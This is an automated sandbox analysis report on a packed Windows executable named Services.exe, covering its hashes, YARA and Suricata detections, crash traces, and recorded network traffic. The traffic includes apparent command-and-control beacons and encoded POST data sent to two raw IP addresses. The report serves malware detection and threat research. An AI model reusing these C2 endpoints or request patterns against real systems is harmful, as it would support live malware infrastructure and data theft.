Summary | ZeroBOX

Services.exe

UPX VMProtect PE32 PE File
Category Machine Started Completed
FILE s1_win7_x6401 Nov. 7, 2023, 7:40 a.m. Nov. 7, 2023, 7:44 a.m.
Size 4.8MB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 d9ce98a0b0029d26876ac86409bac27e
SHA256 c6185a23c51b8ac77e6c1bdf2cd4a8d39b02af8b8027d4162cf9766d19cf87c8
CRC32 FE1CD402
ssdeep 98304:T/kRk50qK5N7jdM2gOpqufwX9h+3dcWUWZJziS1hZUZyeYOth3fOCQb9GK1/49s:bokO9jdMxOUUwWdiWmS+JuZGKJ49
Yara
  • UPX_Zero - UPX packed file
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)
  • VMProtect_Zero - VMProtect packed file


Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49162 -> 149.154.167.99:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49168 -> 62.217.160.2:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49165 -> 104.244.42.1:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49167 -> 5.255.255.70:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49169 -> 213.180.204.24:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49174 -> 94.142.138.131:80 2045779 ET MALWARE Win32/BeamWinHTTP CnC Activity M2 (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49170 -> 91.92.243.151:80 2045779 ET MALWARE Win32/BeamWinHTTP CnC Activity M2 (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49177 -> 104.26.5.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49172 -> 172.67.193.129:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49175 -> 34.117.59.81:443 2025331 ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) Device Retrieving External IP Address Detected
TCP 192.168.56.101:49175 -> 34.117.59.81:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 149.154.167.99:443 -> 192.168.56.101:49164 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.101:49178 -> 172.67.75.166:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint

TLSv1 192.168.56.101:49167 -> 5.255.255.70:443
Issuer: C=BE, O=GlobalSign nv-sa, CN=GlobalSign ECC OV SSL CA 2018
Subject: C=RU, ST=Moscow, L=Moscow, O=Yandex LLC, CN=*.xn--d1acpjx3f.xn--p1ai
Fingerprint: e4:ba:b2:7f:bf:93:b8:22:10:26:70:37:9c:03:1a:9d:fb:23:17:24

TLSv1 192.168.56.101:49169 -> 213.180.204.24:443
Issuer: C=BE, O=GlobalSign nv-sa, CN=GlobalSign RSA OV SSL CA 2018
Subject: C=RU, ST=Moscow, L=Moscow, O=Yandex LLC, CN=sso.passport.yandex.ru
Fingerprint: 3a:82:43:a9:43:9c:c8:90:01:04:4f:74:1b:6c:cd:4b:9b:19:7d:93

TLSv1 192.168.56.101:49177 -> 104.26.5.15:443
Issuer: C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2
Subject: C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com
Fingerprint: 03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5

TLSv1 192.168.56.101:49168 -> 62.217.160.2:443
Issuer: C=BE, O=GlobalSign nv-sa, CN=GlobalSign RSA OV SSL CA 2018
Subject: C=RU, ST=Moscow, L=Moscow, O=VK LLC, CN=*.dzen.ru
Fingerprint: 6a:31:14:29:60:07:c9:c6:17:7b:d1:27:ad:53:57:ec:d8:c1:d8:d2

TLSv1 192.168.56.101:49172 -> 172.67.193.129:443
Issuer: C=US, O=Let's Encrypt, CN=E1
Subject: CN=ironhost.io
Fingerprint: bf:96:55:fe:92:31:2c:3b:86:d9:a5:21:ac:2a:4c:b7:56:b7:9e:19

TLSv1 192.168.56.101:49178 -> 172.67.75.166:443
Issuer: C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2
Subject: C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com
Fingerprint: 03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5

registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
section .vmp0
section .vmp1
section .vmp2
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
WinHttpCloseHandle-0x3e3 winhttp+0x281e @ 0x741c281e
WinHttpCloseHandle-0x30d winhttp+0x28f4 @ 0x741c28f4
WinHttpCloseHandle+0x53 WinHttpSetOption-0x1318 winhttp+0x2c54 @ 0x741c2c54
services+0x2ebe5 @ 0x20ebe5
services+0x578e @ 0x1e578e
services+0x5739 @ 0x1e5739
services+0x699a @ 0x1e699a
services+0xe696 @ 0x1ee696
services+0x38310 @ 0x218310
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 81 79 24 41 41 41 41 0f 85 b4 0d 00 00 83 65 e4
exception.instruction: cmp dword ptr [ecx + 0x24], 0x41414141
exception.exception_code: 0xc0000005
exception.symbol: WinHttpCloseHandle-0x4ae winhttp+0x2753
exception.address: 0x741c2753
registers.esp: 12703936
registers.edi: 132
registers.eax: 12703964
registers.ebp: 12703980
registers.edx: 12705140
registers.ebx: 132
registers.esi: 0
registers.ecx: 132
1 0 0

__exception__

stacktrace:
WinHttpCloseHandle-0x3e3 winhttp+0x281e @ 0x741c281e
WinHttpCloseHandle+0x79 WinHttpSetOption-0x12f2 winhttp+0x2c7a @ 0x741c2c7a
services+0x2ebe5 @ 0x20ebe5
services+0x578e @ 0x1e578e
services+0x5739 @ 0x1e5739
services+0x699a @ 0x1e699a
services+0xe696 @ 0x1ee696
services+0x38310 @ 0x218310
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 81 79 24 41 41 41 41 0f 85 b4 0d 00 00 83 65 e4
exception.instruction: cmp dword ptr [ecx + 0x24], 0x41414141
exception.exception_code: 0xc0000005
exception.symbol: WinHttpCloseHandle-0x4ae winhttp+0x2753
exception.address: 0x741c2753
registers.esp: 12705040
registers.edi: 132
registers.eax: 12705068
registers.ebp: 12705084
registers.edx: 0
registers.ebx: 132
registers.esi: 0
registers.ecx: 132
1 0 0

__exception__

stacktrace:
services+0x103bd @ 0x1f03bd
services+0x38310 @ 0x218310
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: f7 f1 8b d8 8b 44 24 0c f7 f1 8b d3 eb 41 8b c8
exception.symbol: services+0x4eef4
exception.instruction: div ecx
exception.module: Services.exe
exception.exception_code: 0xc0000094
exception.offset: 323316
exception.address: 0x22eef4
registers.esp: 12705220
registers.edi: 0
registers.eax: 0
registers.ebp: 12706224
registers.edx: 0
registers.ebx: 12706244
registers.esi: 169236000
registers.ecx: 0
1 0 0
suspicious_features: GET method with no useragent header, Connection to IP address
suspicious_request: GET http://91.92.243.151/api/tracemap.php
suspicious_features: GET method with no useragent header, Connection to IP address
suspicious_request: GET http://94.142.138.131/api/tracemap.php
suspicious_features: POST method with no referer header, Connection to IP address
suspicious_request: POST http://94.142.138.131/api/firecom.php
request GET http://91.92.243.151/api/tracemap.php
request GET http://apps.identrust.com/roots/dstrootcax3.p7c
request GET http://94.142.138.131/api/tracemap.php
request POST http://94.142.138.131/api/firecom.php
request GET http://www.maxmind.com/geoip/v2.1/city/me
request GET https://yandex.ru/
request GET https://dzen.ru/?yredirect=true
request GET https://sso.passport.yandex.ru/push?uuid=17ee63be-a01d-4351-b836-3f7809d3449d&retpath=https%3A%2F%2Fdzen.ru%2F%3Fyredirect%3Dtrue
request GET https://db-ip.com/
request POST https://api.db-ip.com/v2/p31e4d59ee6ad1a0b5cc80695a873e43a8fbca06/self
request POST http://94.142.138.131/api/firecom.php
request POST https://api.db-ip.com/v2/p31e4d59ee6ad1a0b5cc80695a873e43a8fbca06/self
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2664
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a20000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0
domain ipinfo.io
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
section {u'size_of_data': u'0x004af400', u'virtual_address': u'0x002e2000', u'entropy': 7.993526835082115, u'name': u'.vmp2', u'virtual_size': u'0x004af280'} entropy 7.99352683508 description A section with a high entropy has been found
section {u'size_of_data': u'0x00018400', u'virtual_address': u'0x00794000', u'entropy': 7.392826746214749, u'name': u'.rsrc', u'virtual_size': u'0x000267e6'} entropy 7.39282674621 description A section with a high entropy has been found
entropy 0.998266190719 description Overall entropy of this PE file is high
section .vmp0 description Section name indicates VMProtect
section .vmp1 description Section name indicates VMProtect
section .vmp2 description Section name indicates VMProtect
host 125.253.92.50
host 91.92.243.151
host 94.142.138.131
Time & API Arguments Status Return Repeated

WSASend

buffer: GET /api/tracemap.php HTTP/1.1 Connection: Keep-Alive Host: 91.92.243.151
socket: 956
0 0

WSASend

buffer: GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com
socket: 1016
0 0

WSASend

buffer: GET /api/tracemap.php HTTP/1.1 Connection: Keep-Alive Host: 94.142.138.131
socket: 960
0 0

WSASend

buffer: POST /api/firecom.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 25 Host: 94.142.138.131
socket: 960
0 0

WSASend

buffer: data=m7moirmur7WzsqDt8ug=
socket: 960
0 0

WSASend

buffer: GET /geoip/v2.1/city/me HTTP/1.1 Connection: Keep-Alive Referer: https://www.maxmind.com/en/locate-my-ip-address User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: www.maxmind.com
socket: 1080
0 0

WSASend

buffer: POST /api/firecom.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 13 Host: 94.142.138.131
socket: 960
0 0

WSASend

buffer: data=m7molYw=
socket: 960
0 0

WSASend

buffer: POST /api/firecom.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 69 Host: 94.142.138.131
socket: 960
0 0

WSASend

buffer: data=m7mokLO9uLmukLWyt6C4uem57-W_5L7lvurkvr_uv-657-3ovum97b_s6OrluKA=
socket: 960
0 0